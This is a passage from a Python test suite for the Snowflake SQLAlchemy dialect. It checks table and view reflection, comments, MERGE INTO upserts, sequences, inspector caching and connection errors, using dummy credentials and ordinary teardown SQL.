assert primary_keys['constrained_columns'] == ['id']\n\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_foreign_keys(engine_testaccount):\n \"\"\"\n Tests foreign keys\n \"\"\"\n metadata = MetaData()\n fk_name = 'fk_users_id_from_addresses'\n users, addresses = _create_users_addresses_tables(\n engine_testaccount,\n metadata, fk=fk_name)\n\n try:\n inspector = inspect(engine_testaccount)\n foreign_keys = inspector.get_foreign_keys('addresses')\n assert foreign_keys[0]['name'] == fk_name\n assert foreign_keys[0]['constrained_columns'] == ['user_id']\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_multile_column_primary_key(engine_testaccount):\n \"\"\"\n Tests multicolumn primary key with and without autoincrement\n \"\"\"\n metadata = MetaData()\n mytable = Table('mytable', metadata,\n Column('gid',\n Integer,\n primary_key=True,\n autoincrement=False),\n Column('id',\n Integer,\n primary_key=True,\n autoincrement=True))\n\n metadata.create_all(engine_testaccount)\n try:\n inspector = inspect(engine_testaccount)\n columns_in_mytable = inspector.get_columns('mytable')\n assert not columns_in_mytable[0]['autoincrement'], 'autoincrement'\n assert columns_in_mytable[0]['default'] is None, 'default'\n assert columns_in_mytable[0]['name'] == 'gid', 'name'\n assert columns_in_mytable[0]['primary_key'], 'primary key'\n assert columns_in_mytable[1]['autoincrement'], 'autoincrement'\n assert columns_in_mytable[1]['default'] is None, 'default'\n assert columns_in_mytable[1]['name'] == 'id', 'name'\n assert columns_in_mytable[1]['primary_key'], 'primary key'\n\n primary_keys = inspector.get_pk_constraint('mytable')\n assert primary_keys['constrained_columns'] == ['gid', 'id']\n\n finally:\n mytable.drop(engine_testaccount)\n\n\ndef test_create_table_with_cluster_by(engine_testaccount):\n # Test case for https://github.com/snowflakedb/snowflake-sqlalchemy/pull/14\n metadata = MetaData()\n user = Table('clustered_user', metadata,\n Column('Id', Integer, primary_key=True),\n Column('name', String),\n snowflake_clusterby=['Id', 'name'])\n metadata.create_all(engine_testaccount)\n try:\n inspector = 
inspect(engine_testaccount)\n columns_in_table = inspector.get_columns('clustered_user')\n assert columns_in_table[0]['name'] == 'Id', 'name'\n finally:\n user.drop(engine_testaccount)\n\n\ndef test_view_names(engine_testaccount):\n \"\"\"\n Tests all views\n \"\"\"\n inspector = inspect(engine_testaccount)\n\n information_schema_views = inspector.get_view_names(\n schema='information_schema')\n assert 'columns' in information_schema_views\n assert 'table_constraints' in information_schema_views\n\n\ndef test_view_definition(engine_testaccount, db_parameters):\n \"\"\"\n Tests view definition\n \"\"\"\n test_table_name = \"test_table_sqlalchemy\"\n test_view_name = \"testview_sqlalchemy\"\n engine_testaccount.execute(\"\"\"\nCREATE OR REPLACE TABLE {0} (\n id INTEGER,\n name STRING\n)\n\"\"\".format(test_table_name))\n sql = \"\"\"\nCREATE OR REPLACE VIEW {0} AS\nSELECT * FROM {1} WHERE id > 10\"\"\".format(\n test_view_name, test_table_name)\n engine_testaccount.execute(text(sql).execution_options(\n autocommit=True))\n try:\n inspector = inspect(engine_testaccount)\n assert inspector.get_view_definition(test_view_name) == sql.strip()\n assert inspector.get_view_definition(test_view_name,\n db_parameters['schema']) == \\\n sql.strip()\n assert inspector.get_view_names() == [test_view_name]\n finally:\n engine_testaccount.execute(text(\n \"DROP TABLE IF EXISTS {0}\".format(test_table_name)))\n engine_testaccount.execute(text(\n \"DROP VIEW IF EXISTS {0}\".format(test_view_name)))\n\n\ndef test_view_comment_reading(engine_testaccount, db_parameters):\n \"\"\"\n Tests reading a comment from a view once it's defined\n \"\"\"\n test_table_name = \"test_table_sqlalchemy\"\n test_view_name = \"testview_sqlalchemy\"\n engine_testaccount.execute(\"\"\"\nCREATE OR REPLACE TABLE {} (\n id INTEGER,\n name STRING\n)\n\"\"\".format(test_table_name))\n sql = \"\"\"\nCREATE OR REPLACE VIEW {} AS\nSELECT * FROM {} WHERE id > 10\"\"\".format(\n test_view_name, test_table_name)\n engine_testaccount.execute(text(sql).execution_options(\n autocommit=True))\n comment_text = \"hello my viewing friends\"\n sql = \"COMMENT ON VIEW {} IS '{}';\".format(\n test_view_name, comment_text)\n engine_testaccount.execute(text(sql).execution_options(\n autocommit=True))\n try:\n inspector = inspect(engine_testaccount)\n # NOTE: sqlalchemy doesn't have a way to get view comments specifically,\n # but the code to get table comments should work for views too\n assert inspector.get_table_comment(test_view_name) == {'text': comment_text}\n assert inspector.get_table_comment(test_table_name) == {'text': None}\n assert str(inspector.get_columns(test_table_name)) == str(inspector.get_columns(test_view_name))\n finally:\n engine_testaccount.execute(text(\n \"DROP TABLE IF EXISTS {0}\".format(test_table_name)))\n engine_testaccount.execute(text(\n \"DROP VIEW IF EXISTS {0}\".format(test_view_name)))\n\n\n@pytest.mark.skip(\"Temp table cannot be viewed for some reason\")\ndef test_get_temp_table_names(engine_testaccount):\n num_of_temp_tables = 2\n temp_table_name = \"temp_table\"\n for idx in range(num_of_temp_tables):\n engine_testaccount.execute(text(\"\"\"\nCREATE TEMPORARY TABLE {0} (col1 integer, col2 string)\n\"\"\".format(temp_table_name + str(idx))).execution_options(\n autocommit=True))\n for row in engine_testaccount.execute(\"SHOW TABLES\"):\n print(row)\n try:\n inspector = inspect(engine_testaccount)\n temp_table_names = inspector.get_temp_table_names()\n assert len(temp_table_names) == num_of_temp_tables\n finally:\n 
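# --- Illustrative aside: the view-reflection calls used by test_view_names /
# test_view_definition above, run against SQLite so no test account is needed.
# Written in the same SQLAlchemy 1.x style as the rest of this file; the
# Snowflake tests additionally check that the definition round-trips exactly
# and that an explicit schema argument is honoured.
from sqlalchemy import create_engine, inspect, text

_engine = create_engine('sqlite://')
_engine.execute(text("CREATE TABLE test_table_sqlalchemy (id INTEGER, name TEXT)"))
_engine.execute(text("CREATE VIEW testview_sqlalchemy AS "
                     "SELECT * FROM test_table_sqlalchemy WHERE id > 10"))

_inspector = inspect(_engine)
print(_inspector.get_view_names())                              # ['testview_sqlalchemy']
print(_inspector.get_view_definition('testview_sqlalchemy'))    # the CREATE VIEW statement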
pass\n\n\ndef test_create_table_with_schema(engine_testaccount, db_parameters):\n metadata = MetaData()\n new_schema = db_parameters['schema'] + \"_NEW\"\n engine_testaccount.execute(text(\n \"CREATE OR REPLACE SCHEMA \\\"{0}\\\"\".format(new_schema)))\n Table('users', metadata,\n Column('id', Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name', String),\n Column('fullname', String),\n schema=new_schema\n )\n metadata.create_all(engine_testaccount)\n\n try:\n inspector = inspect(engine_testaccount)\n columns_in_users = inspector.get_columns('users', schema=new_schema)\n assert columns_in_users is not None\n finally:\n metadata.drop_all(engine_testaccount)\n engine_testaccount.execute(\n text(\"DROP SCHEMA IF EXISTS \\\"{0}\\\"\".format(new_schema)))\n\n\n@pytest.mark.skipif(os.getenv(\"SNOWFLAKE_GCP\") is not None, reason=\"PUT and GET is not supported for GCP yet\")\ndef test_copy(engine_testaccount):\n \"\"\"\n COPY must be in a transaction\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n\n try:\n engine_testaccount.execute(\n \"PUT file://{file_name} @%users\".format(\n file_name=os.path.join(THIS_DIR, \"data\", \"users.txt\")))\n engine_testaccount.execute(\"COPY INTO users\")\n results = engine_testaccount.execute(\"SELECT * FROM USERS\").fetchall()\n assert results is not None and len(results) > 0\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\n@pytest.mark.skip(\"\"\"\nNo transaction works yet in the core API. Use orm API or Python Connector\ndirectly if needed at the moment.\nNote Snowflake DB supports DML transaction natively, but we have not figured out\nhow to integrate with SQLAlchemy core API yet.\n\"\"\")\ndef test_transaction(engine_testaccount, db_parameters):\n engine_testaccount.execute(text(\"\"\"\nCREATE TABLE {0} (c1 number)\"\"\".format(db_parameters['name'])))\n trans = engine_testaccount.connect().begin()\n try:\n engine_testaccount.execute(text(\"\"\"\nINSERT INTO {0} VALUES(123)\n \"\"\".format(db_parameters['name'])))\n trans.commit()\n engine_testaccount.execute(text(\"\"\"\nINSERT INTO {0} VALUES(456)\n \"\"\".format(db_parameters['name'])))\n trans.rollback()\n results = engine_testaccount.execute(\"\"\"\nSELECT * FROM {0}\n\"\"\".format(db_parameters['name'])).fetchall()\n assert results == [(123,)]\n finally:\n engine_testaccount.execute(text(\"\"\"\nDROP TABLE IF EXISTS {0}\n\"\"\".format(db_parameters['name'])))\n\n\ndef test_get_schemas(engine_testaccount):\n \"\"\"\n Tests get schemas from inspect.\n\n Although the method get_schema_names is not part of DefaultDialect,\n inspect() may call the method if exists.\n \"\"\"\n inspector = inspect(engine_testaccount)\n\n schemas = inspector.get_schema_names()\n assert 'information_schema' in schemas\n\n\ndef test_column_metadata(engine_testaccount):\n from sqlalchemy.ext.declarative import declarative_base\n\n Base = declarative_base()\n\n class Appointment(Base):\n __tablename__ = 'appointment'\n id = Column(Numeric(38, 3), primary_key=True)\n string_with_len = Column(String(100))\n binary_data = Column(LargeBinary)\n real_data = Column(REAL)\n\n Base.metadata.create_all(engine_testaccount)\n\n metadata = Base.metadata\n\n t = Table('appointment', metadata)\n\n inspector = inspect(engine_testaccount)\n inspector.reflecttable(t, None)\n assert str(t.columns['id'].type) == 'DECIMAL(38, 3)'\n assert str(t.columns['string_with_len'].type) == 'VARCHAR(100)'\n assert 
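# --- Illustrative aside: the declare-create-reflect round trip that
# test_column_metadata checks, shown on SQLite so the snippet runs anywhere.
# The type names reported by reflection are dialect-specific: the test asserts
# that Snowflake reports DECIMAL(38, 3), VARCHAR(100), BINARY and FLOAT for the
# columns below; SQLite will report its own spellings, so this sketch only
# prints them.
from sqlalchemy import (MetaData, Table, Column, Numeric, String, LargeBinary,
                        create_engine)
from sqlalchemy.types import REAL

_engine = create_engine('sqlite://')
_meta = MetaData()
Table('appointment', _meta,
      Column('id', Numeric(38, 3), primary_key=True),
      Column('string_with_len', String(100)),
      Column('binary_data', LargeBinary),
      Column('real_data', REAL))
_meta.create_all(_engine)

_reflected = Table('appointment', MetaData(), autoload=True, autoload_with=_engine)
for _col in _reflected.columns:
    print(_col.name, _col.type)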
str(t.columns['binary_data'].type) == 'BINARY'\n assert str(t.columns['real_data'].type) == 'FLOAT'\n\n\ndef _get_engine_with_columm_metadata_cache(\n db_parameters, user=None, password=None, account=None):\n \"\"\"\n Creates a connection with column metadata cache\n \"\"\"\n if user is not None:\n db_parameters['user'] = user\n if password is not None:\n db_parameters['password'] = password\n if account is not None:\n db_parameters['account'] = account\n\n from sqlalchemy.pool import NullPool\n from sqlalchemy import create_engine\n from snowflake.sqlalchemy import URL\n engine = create_engine(URL(\n user=db_parameters['user'],\n password=db_parameters['password'],\n host=db_parameters['host'],\n port=db_parameters['port'],\n database=db_parameters['database'],\n schema=db_parameters['schema'],\n account=db_parameters['account'],\n protocol=db_parameters['protocol'],\n cache_column_metadata=True,\n ), poolclass=NullPool)\n\n return engine\n\n\ndef test_many_table_column_metadta(db_parameters):\n \"\"\"\n Get dozens of table metadata with column metadata cache.\n\n cache_column_metadata=True will cache all column metadata for all tables\n in the schema.\n \"\"\"\n engine = _get_engine_with_columm_metadata_cache(db_parameters)\n RE_SUFFIX_NUM = re.compile(r'.*(\\d+)$')\n metadata = MetaData()\n total_objects = 10\n for idx in range(total_objects):\n Table('mainusers' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name' + str(idx), String),\n Column('fullname', String),\n Column('password', String)\n )\n Table('mainaddresses' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id' + str(idx), None,\n ForeignKey('mainusers' + str(idx) + '.id' + str(idx))),\n Column('email_address' + str(idx), String, nullable=False)\n )\n metadata.create_all(engine)\n\n inspector = inspect(engine)\n cnt = 0\n schema = inspector.default_schema_name\n for table_name in inspector.get_table_names(schema):\n m = RE_SUFFIX_NUM.match(table_name)\n if m:\n suffix = m.group(1)\n cs = inspector.get_columns(table_name, schema)\n if table_name.startswith(\"mainusers\"):\n assert len(cs) == 4\n assert cs[1]['name'] == 'name' + suffix\n cnt += 1\n elif table_name.startswith(\"mainaddresses\"):\n assert len(cs) == 3\n assert cs[2]['name'] == 'email_address' + suffix\n cnt += 1\n ps = inspector.get_pk_constraint(table_name, schema)\n if table_name.startswith(\"mainusers\"):\n assert ps['constrained_columns'] == ['id' + suffix]\n elif table_name.startswith(\"mainaddresses\"):\n assert ps['constrained_columns'] == ['id' + suffix]\n fs = inspector.get_foreign_keys(table_name, schema)\n if table_name.startswith(\"mainusers\"):\n assert len(fs) == 0\n elif table_name.startswith(\"mainaddresses\"):\n assert len(fs) == 1\n assert fs[0]['constrained_columns'] == ['user_id' + suffix]\n assert fs[0]['referred_table'] == 'mainusers' + suffix\n\n assert cnt == total_objects * 2, 'total number of test objects'\n\n\ndef test_cache_time(engine_testaccount, db_parameters):\n \"\"\"Check whether Inspector cache is working\"\"\"\n # Set up necessary tables\n metadata = MetaData()\n total_objects = 10\n for idx in range(total_objects):\n Table('mainusers' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name' + str(idx), String),\n Column('fullname', String),\n Column('password', String)\n )\n Table('mainaddresses' + str(idx), metadata,\n 
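# --- Illustrative aside: the engine construction used by
# _get_engine_with_columm_metadata_cache above. Passing
# cache_column_metadata=True through snowflake.sqlalchemy.URL makes the dialect
# fetch and cache column metadata for the whole schema on the first
# get_columns() call. Every credential value below is a placeholder.
from sqlalchemy import create_engine
from sqlalchemy.pool import NullPool
from snowflake.sqlalchemy import URL

_engine = create_engine(
    URL(
        user='testuser',          # placeholder
        password='********',      # placeholder
        account='testaccount',    # placeholder
        database='testdb',        # placeholder
        schema='public',          # placeholder
        cache_column_metadata=True,
    ),
    poolclass=NullPool,
)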
Column('id' + str(idx), Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id' + str(idx), None,\n ForeignKey('mainusers' + str(idx) + '.id' + str(idx))),\n Column('email_address' + str(idx), String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n inspector = inspect(engine_testaccount)\n schema = db_parameters['schema']\n\n def harass_inspector():\n for table_name in inspector.get_table_names(schema):\n inspector.get_columns(table_name, schema)\n inspector.get_pk_constraint(table_name, schema)\n inspector.get_foreign_keys(table_name, schema)\n\n outcome = False\n # Allow up to 5 times for the speed test to pass to avoid flaky test\n for _ in range(5):\n # Python 2.7 has no timeit.timeit with globals and locals parameters\n s_time = time.time()\n harass_inspector()\n m_time = time.time()\n harass_inspector()\n time2 = time.time() - m_time\n time1 = m_time - s_time\n print(\"Ran inspector through tables twice, times:\\n\\tfirst: {0}\\n\\tsecond: {1}\".format(time1, time2))\n if time2 < time1 * 0.01:\n outcome = True\n break\n else:\n # Reset inspector to reset cache\n inspector = inspect(engine_testaccount)\n metadata.drop_all(engine_testaccount)\n assert outcome\n\n\n@pytest.mark.timeout(15)\ndef test_region():\n from sqlalchemy import create_engine\n engine = create_engine(URL(\n user='testuser',\n password='testpassword',\n account='testaccount',\n region='eu-central-1',\n login_timeout=5\n ))\n try:\n engine.execute('select current_version()').fetchone()\n pytest.fail('should not run')\n except Exception as ex:\n assert ex.orig.errno == 250001\n assert 'Failed to connect to DB' in ex.orig.msg\n assert 'testaccount.eu-central-1.snowflakecomputing.com' in ex.orig.msg\n\n\n@pytest.mark.timeout(15)\ndef test_azure():\n from sqlalchemy import create_engine\n engine = create_engine(URL(\n user='testuser',\n password='testpassword',\n account='testaccount',\n region='east-us-2.azure',\n login_timeout=5\n ))\n try:\n engine.execute('select current_version()').fetchone()\n pytest.fail('should not run')\n except Exception as ex:\n assert ex.orig.errno == 250001\n assert 'Failed to connect to DB' in ex.orig.msg\n assert 'testaccount.east-us-2.azure.snowflakecomputing.com' in \\\n ex.orig.msg\n\n\ndef test_load_dialect():\n \"\"\"\n Test loading Snowflake SQLAlchemy dialect class\n \"\"\"\n assert isinstance(dialects.registry.load('snowflake')(), dialect)\n\n\n@pytest.mark.parametrize('conditional_flag', [True, False])\n@pytest.mark.parametrize('update_flag,insert_flag,delete_flag', [\n (True, False, False),\n (False, True, False),\n (False, False, True),\n (False, True, True),\n (True, True, False)])\ndef test_upsert(engine_testaccount, update_flag, insert_flag, delete_flag, conditional_flag):\n meta = MetaData()\n users = Table('users', meta,\n Column('id', Integer, Sequence('user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String))\n onboarding_users = Table('onboarding_users', meta,\n Column('id', Integer, Sequence('new_user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String),\n Column('delete', Boolean))\n meta.create_all(engine_testaccount)\n conn = engine_testaccount.connect()\n try:\n conn.execute(users.insert(), [\n {'id': 1, 'name': 'mark', 'fullname': 'Mark Keller'},\n {'id': 4, 'name': 'luke', 'fullname': 'Luke Lorimer'},\n {'id': 2, 'name': 'amanda', 'fullname': 'Amanda Harris'}])\n conn.execute(onboarding_users.insert(), [\n {'id': 2, 'name': 'amanda', 'fullname': 'Amanda Charlotte 
Harris', 'delete': True},\n {'id': 3, 'name': 'jim', 'fullname': 'Jim Wang', 'delete': False},\n {'id': 4, 'name': 'lukas', 'fullname': 'Lukas Lorimer', 'delete': False},\n {'id': 5, 'name': 'andras', 'fullname': None, 'delete': False}\n ])\n\n merge = MergeInto(users, onboarding_users, users.c.id == onboarding_users.c.id)\n if update_flag:\n clause = merge.when_matched_then_update().values(name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname)\n if conditional_flag:\n clause.where(onboarding_users.c.name != 'amanda')\n if insert_flag:\n clause = merge.when_not_matched_then_insert().values(\n id=onboarding_users.c.id,\n name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname,\n )\n if conditional_flag:\n clause.where(onboarding_users.c.fullname != None) # NOQA\n if delete_flag:\n clause = merge.when_matched_then_delete()\n if conditional_flag:\n clause.where(onboarding_users.c.delete == True) # NOQA\n\n conn.execute(merge)\n users_tuples = {tuple(row) for row in conn.execute(select([users]))}\n onboarding_users_tuples = {tuple(row) for row in conn.execute(select([onboarding_users]))}\n expected_users = {\n (1, 'mark', 'Mark Keller'),\n (2, 'amanda', 'Amanda Harris'),\n (4, 'luke', 'Luke Lorimer')\n }\n if update_flag:\n if not conditional_flag:\n expected_users.remove((2, 'amanda', 'Amanda Harris'))\n expected_users.add((2, 'amanda', 'Amanda Charlotte Harris'))\n expected_users.remove((4, 'luke', 'Luke Lorimer'))\n expected_users.add((4, 'lukas', 'Lukas Lorimer'))\n elif delete_flag:\n if not conditional_flag:\n expected_users.remove((4, 'luke', 'Luke Lorimer'))\n expected_users.remove((2, 'amanda', 'Amanda Harris'))\n if insert_flag:\n if not conditional_flag:\n expected_users.add((5, 'andras', None))\n expected_users.add((3, 'jim', 'Jim Wang'))\n expected_onboarding_users = {\n (2, 'amanda', 'Amanda Charlotte Harris', True),\n (3, 'jim', 'Jim Wang', False),\n (4, 'lukas', 'Lukas Lorimer', False),\n (5, 'andras', None, False)\n }\n assert users_tuples == expected_users\n assert onboarding_users_tuples == expected_onboarding_users\n finally:\n conn.close()\n users.drop(engine_testaccount)\n onboarding_users.drop(engine_testaccount)\n\n\ndef test_deterministic_merge_into(sql_compiler):\n meta = MetaData()\n users = Table('users', meta,\n Column('id', Integer, Sequence('user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String))\n onboarding_users = Table('onboarding_users', meta,\n Column('id', Integer, Sequence('new_user_id_seq'), primary_key=True),\n Column('name', String),\n Column('fullname', String),\n Column('delete', Boolean))\n merge = MergeInto(users, onboarding_users, users.c.id == onboarding_users.c.id)\n merge.when_matched_then_update().values(name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname)\n merge.when_not_matched_then_insert().values(\n id=onboarding_users.c.id,\n name=onboarding_users.c.name,\n fullname=onboarding_users.c.fullname,\n ).where(onboarding_users.c.fullname != None) # NOQA\n assert sql_compiler(merge) == \"MERGE INTO users USING onboarding_users ON users.id = onboarding_users.id \" \\\n \"WHEN MATCHED THEN UPDATE SET fullname = onboarding_users.fullname, \" \\\n \"name = onboarding_users.name WHEN NOT MATCHED AND onboarding_users.fullname \" \\\n \"IS NOT NULL THEN INSERT (fullname, id, name) VALUES (onboarding_users.fullname, \" \\\n \"onboarding_users.id, onboarding_users.name)\"\n\n\ndef test_comments(engine_testaccount):\n \"\"\"Tests strictly reading column comment through 
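# --- Illustrative aside: the MERGE INTO construction that test_upsert and
# test_deterministic_merge_into exercise, in isolation. The two tables mirror
# the ones defined in the tests; `engine` is assumed to be an already
# configured Snowflake engine (placeholder), so the execute line is only
# indicated in a comment.
from sqlalchemy import MetaData, Table, Column, Integer, String, Boolean, Sequence
from snowflake.sqlalchemy import MergeInto

_meta = MetaData()
_users = Table('users', _meta,
               Column('id', Integer, Sequence('user_id_seq'), primary_key=True),
               Column('name', String),
               Column('fullname', String))
_onboarding_users = Table('onboarding_users', _meta,
                          Column('id', Integer, Sequence('new_user_id_seq'), primary_key=True),
                          Column('name', String),
                          Column('fullname', String),
                          Column('delete', Boolean))

_merge = MergeInto(_users, _onboarding_users, _users.c.id == _onboarding_users.c.id)
_merge.when_matched_then_update().values(name=_onboarding_users.c.name,
                                         fullname=_onboarding_users.c.fullname)
_merge.when_not_matched_then_insert().values(
    id=_onboarding_users.c.id,
    name=_onboarding_users.c.name,
    fullname=_onboarding_users.c.fullname,
).where(_onboarding_users.c.fullname != None)  # NOQA

# With a live Snowflake engine the statement runs like any other clause:
# engine.connect().execute(_merge)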
SQLAlchemy\"\"\"\n table_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5))\n try:\n engine_testaccount.execute(\"create table public.{} (\\\"col1\\\" text);\".format(table_name))\n engine_testaccount.execute(\"alter table public.{} alter \\\"col1\\\" comment 'this is my comment'\".format(table_name))\n engine_testaccount.execute(\"select comment from information_schema.columns where table_name='{}'\".format(table_name)).fetchall()\n inspector = inspect(engine_testaccount)\n columns = inspector.get_columns(table_name, schema='PUBLIC')\n assert columns[0].get('comment') == u'this is my comment'\n finally:\n engine_testaccount.execute(\"drop table public.{}\".format(table_name))\n\n\ndef test_comment_sqlalchemy(db_parameters, engine_testaccount, on_public_ci):\n \"\"\"Testing adding/reading column and table comments through SQLAlchemy\"\"\"\n new_schema = db_parameters['schema'] + '2'\n # Use same table name in 2 different schemas to make sure comment retrieval works properly\n table_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5))\n table_comment1 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n column_comment1 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n table_comment2 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n column_comment2 = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))\n engine2, _ = get_engine(schema=new_schema)\n con2 = None\n if not on_public_ci:\n con2 = engine2.connect()\n con2.execute(\"CREATE SCHEMA IF NOT EXISTS {0}\".format(new_schema))\n inspector = inspect(engine_testaccount)\n metadata1 = MetaData()\n metadata2 = MetaData()\n mytable1 = Table(table_name,\n metadata1,\n Column(\"tstamp\", DateTime, comment=column_comment1),\n comment=table_comment1)\n mytable2 = Table(table_name,\n metadata2,\n Column(\"tstamp\", DateTime, comment=column_comment2),\n comment=table_comment2)\n\n metadata1.create_all(engine_testaccount, tables=[mytable1])\n if not on_public_ci:\n metadata2.create_all(engine2, tables=[mytable2])\n\n try:\n assert inspector.get_columns(table_name)[0]['comment'] == column_comment1\n assert inspector.get_table_comment(table_name)['text'] == table_comment1\n if not on_public_ci:\n assert inspector.get_columns(table_name, schema=new_schema)[0]['comment'] == column_comment2\n assert inspector.get_table_comment(\n table_name,\n schema=new_schema.upper() # Note: since did not quote schema name it was uppercase'd\n )['text'] == table_comment2\n finally:\n mytable1.drop(engine_testaccount)\n if not on_public_ci:\n mytable2.drop(engine2)\n con2.execute(\"DROP SCHEMA IF EXISTS {0}\".format(new_schema))\n con2.close()\n engine2.dispose()\n\n\ndef test_special_schema_character(db_parameters, on_public_ci):\n \"\"\"Make sure we decode special characters correctly\"\"\"\n if on_public_ci:\n pytest.skip(\"Public CIs cannot create Schemas and Databases\")\n # Constants\n database = \"a/b/c\" # \"'/'.join([choice(ascii_lowercase) for _ in range(3)])\n schema = \"d/e/f\" # '/'.join([choice(ascii_lowercase) for _ in range(3)])\n # Setup\n options = dict(**db_parameters)\n conn = connect(**options)\n conn.cursor().execute(\"CREATE OR REPLACE DATABASE \\\"{0}\\\"\".format(database))\n conn.cursor().execute(\"CREATE OR REPLACE SCHEMA \\\"{0}\\\"\".format(schema))\n conn.close()\n # Test\n options.update({'database': '\"' + database + '\"',\n 'schema': '\"' + schema + '\"'})\n sf_conn = connect(**options)\n sf_connection = [res for res in 
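# --- Illustrative aside: declaring table and column comments in the schema and
# reading them back, as test_comment_sqlalchemy does. This requires a dialect
# with COMMENT support (the tests use Snowflake); the engine below is a
# placeholder with dummy credentials, so this is a sketch rather than a
# standalone runnable example.
from sqlalchemy import MetaData, Table, Column, DateTime, create_engine, inspect
from snowflake.sqlalchemy import URL

_engine = create_engine(URL(user='testuser', password='********',
                            account='testaccount'))   # placeholder credentials

_meta = MetaData()
_commented = Table('commented_table', _meta,
                   Column('tstamp', DateTime, comment='time the row was written'),
                   comment='table-level comment')
_meta.create_all(_engine)
try:
    _inspector = inspect(_engine)
    print(_inspector.get_table_comment('commented_table')['text'])   # table-level comment
    print(_inspector.get_columns('commented_table')[0]['comment'])   # time the row was written
finally:
    _commented.drop(_engine)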
sf_conn.cursor().execute(\"select current_database(), \"\n \"current_schema();\")]\n sa_conn = create_engine(URL(**options)).connect()\n sa_connection = [res for res in sa_conn.execute(\"select current_database(), \"\n \"current_schema();\")]\n sa_conn.close()\n sf_conn.close()\n # Teardown\n conn = connect(**options)\n conn.cursor().execute(\"DROP DATABASE IF EXISTS \\\"{0}\\\"\".format(database))\n conn.close()\n assert [(database, schema)] == sf_connection == sa_connection\n\n\ndef test_autoincrement(engine_testaccount):\n metadata = MetaData()\n users = Table('users', metadata,\n Column('uid', Integer, Sequence('id_seq'), primary_key=True),\n Column('name', String(39)))\n\n try:\n users.create(engine_testaccount)\n\n connection = engine_testaccount.connect()\n connection.execute(users.insert(), [{'name': 'sf1'}])\n\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1')\n ]\n\n connection.execute(users.insert(), {'name': 'sf2'}, {'name': 'sf3'})\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1'),\n (2, 'sf2'),\n (3, 'sf3')\n ]\n\n connection.execute(users.insert(), {'name': 'sf4'})\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1'),\n (2, 'sf2'),\n (3, 'sf3'),\n (4, 'sf4')\n ]\n\n seq = Sequence('id_seq')\n nextid = connection.execute(seq)\n connection.execute(users.insert(), [{'uid': nextid, 'name': 'sf5'}])\n assert connection.execute(select([users])).fetchall() == [\n (1, 'sf1'),\n (2, 'sf2'),\n (3, 'sf3'),\n (4, 'sf4'),\n (5, 'sf5')\n ]\n finally:\n users.drop(engine_testaccount)\n\n\ndef test_get_too_many_columns(engine_testaccount, db_parameters):\n \"\"\"Check whether Inspector cache is working, when there are too many column to cache whole schema's columns\"\"\"\n # Set up necessary tables\n metadata = MetaData()\n total_objects = 10\n for idx in range(total_objects):\n Table('mainuserss' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name' + str(idx), String),\n Column('fullname', String),\n Column('password', String)\n )\n Table('mainaddressess' + str(idx), metadata,\n Column('id' + str(idx), Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id' + str(idx), None,\n ForeignKey('mainuserss' + str(idx) + '.id' + str(idx))),\n Column('email_address' + str(idx), String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n inspector = inspect(engine_testaccount)\n schema = db_parameters['schema']\n\n # Emulate error\n with patch.object(inspector.dialect, '_get_schema_columns', return_value=None) as mock_method:\n def harass_inspector():\n for table_name in inspector.get_table_names(schema):\n column_metadata = inspector.get_columns(table_name, schema)\n inspector.get_pk_constraint(table_name, schema)\n inspector.get_foreign_keys(table_name, schema)\n assert 3 <= len(column_metadata) <= 4 # Either one of the tables should have 3 or 4 columns\n\n outcome = False\n # Allow up to 5 times for the speed test to pass to avoid flaky test\n for _ in range(5):\n # Python 2.7 has no timeit.timeit with globals and locals parameters\n s_time = time.time()\n harass_inspector()\n m_time = time.time()\n harass_inspector()\n time2 = time.time() - m_time\n time1 = m_time - s_time\n print(\"Ran inspector through tables twice, times:\\n\\tfirst: {0}\\n\\tsecond: {1}\".format(time1, time2))\n if time2 < time1 * 0.01:\n outcome = True\n break\n else:\n # Reset inspector to reset cache\n inspector = inspect(engine_testaccount)\n 
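# --- Illustrative aside: the autoincrement behaviour test_autoincrement relies
# on, shown on SQLite so it runs anywhere. A Sequence-backed integer primary key
# is filled in automatically when the INSERT omits it; SQLite simply ignores the
# Sequence and uses its own rowid autoincrement, while on Snowflake the sequence
# generates the ids and can also be advanced explicitly with
# connection.execute(Sequence('id_seq')), as the test does.
from sqlalchemy import (MetaData, Table, Column, Integer, String, Sequence,
                        create_engine, select)

_engine = create_engine('sqlite://')
_meta = MetaData()
_users = Table('users', _meta,
               Column('uid', Integer, Sequence('id_seq'), primary_key=True),
               Column('name', String(39)))
_users.create(_engine)

_conn = _engine.connect()
_conn.execute(_users.insert(), [{'name': 'sf1'}])
_conn.execute(_users.insert(), {'name': 'sf2'}, {'name': 'sf3'})
print(_conn.execute(select([_users])).fetchall())   # [(1, 'sf1'), (2, 'sf2'), (3, 'sf3')]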
